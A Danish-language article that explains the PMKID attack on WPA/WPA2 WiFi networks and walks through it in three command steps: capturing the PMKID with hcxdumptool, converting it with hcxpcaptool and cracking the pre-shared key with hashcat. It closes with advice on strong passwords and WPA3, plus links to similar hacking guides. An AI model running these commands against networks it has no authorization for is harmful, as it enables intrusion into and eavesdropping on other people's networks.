Sådan hackes WiFi-adgangskode ved hjælp af WPA/WPA2-sårbarheder

Sikkerhedsforskere afslørede for nylig en ny WiFi-hacking -teknik , der gør det nemt at finde ud af WiFi-adgangskoderne til nutidens mest moderne routere. Opdaget af Jens Steube (kaldet "Atom") - udvikler af det berømte password hacking værktøj Hashcat - mens han analyserer den nyligt frigivne WPA3 sikkerhedsstandard, er denne metode rettet mod WPA trådløs netværksprotokol /WPA2 med roaming funktion baseret på PMKID (Pairwise Master Key Identifier). ).

Denne nye WiFi-hacking-metode giver angribere mulighed for at hente PSK-login-adgangskoden (Pre-shared Key) for at hacke sig ind i WiFi-netværk og kigge på internetaktiviteter. Tidligere skulle en angriber vente på, at nogen loggede på netværket og fik EAPOL 4-vejs godkendelseshåndtryk - en netværksgodkendelsesprotokol. Men med den nye metode er det ikke nødvendigt for brugeren at være på målnetværket længere, det skal kun gøres på RSN IE (Robust Security Network Information Element) ved hjælp af en enkelt EAPOL (Extensible Authentication Protocol over LAN) efter sende en anmodning fra adgangspunktet. .

Robust Security Network er en protokol, der etablerer en sikker udveksling over et 802.11 trådløst netværk og bruger et PMKID - nøglen der skal til for at etablere en forbindelse mellem klienten og adgangspunktet.

Sådan hackes Wifi ved hjælp af PMKID

Trin 1: Angriberen bruger et værktøj som f.eks. hcxdumptool (https://github.com/ZerBea/hcxdumptool) (v4.2.0 eller nyere) til at anmode om PMKID'et fra måladgangspunktet og lægge den modtagne ramme ind i en fil.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Trin 2: Ved at bruge hcxcaptool-værktøjet (https://github.com/ZerBea/hcxtools) konverteres rammens output (pcapng-format) til et hash-format godkendt af Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Trin 3: Brug Hashcat adgangskodeknækningsværktøjet (https://github.com/hashcat/hashcat) (v4.2.0 eller højere) for at få adgangskoden til WPA PSK, og du er færdig.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Det er adgangskoden til det trådløse destinationsnetværk, hvor lang tid det tager afhænger af adgangskodens længde og kompleksitet.

"I øjeblikket ved vi ikke, hvor mange leverandører eller routere denne metode vil fungere på, men vi tror, ​​den vil fungere på 802.11i/p/q/r-netværk med netværksskift aktiveret. (dvs. de fleste routere i dag)," sagde Steube.

Da adgangskodehacking kun forekommer, når netværket har portering aktiveret og kræver, at angriberen prøver mange forkerte adgangskoder, opfordres brugerne til at beskytte netværket ved at bruge adgangskoder, der er svære at gætte. Denne type hack virker heller ikke med den nye generations trådløse netværkssikkerhedsprotokol WPA3 på grund af den "nye nøglegenereringsprotokol kaldet Simultaneous Authentication of Equals (SAE)".

Se mere:

• KRACK-angreb bryder WPA2 WiFi-protokollen
• Hvad er interessant ved den nyligt annoncerede WPA3 WiFi-sikkerhedsprotokol?
• Sådan hackes Wifi-adgangskode med Aircrack-Ng
• Sådan finder du ud af din pårørendes Wi-Fi-adgangskode
• Sådan hackes Wifi-adgangskode ved hjælp af Wifiphisher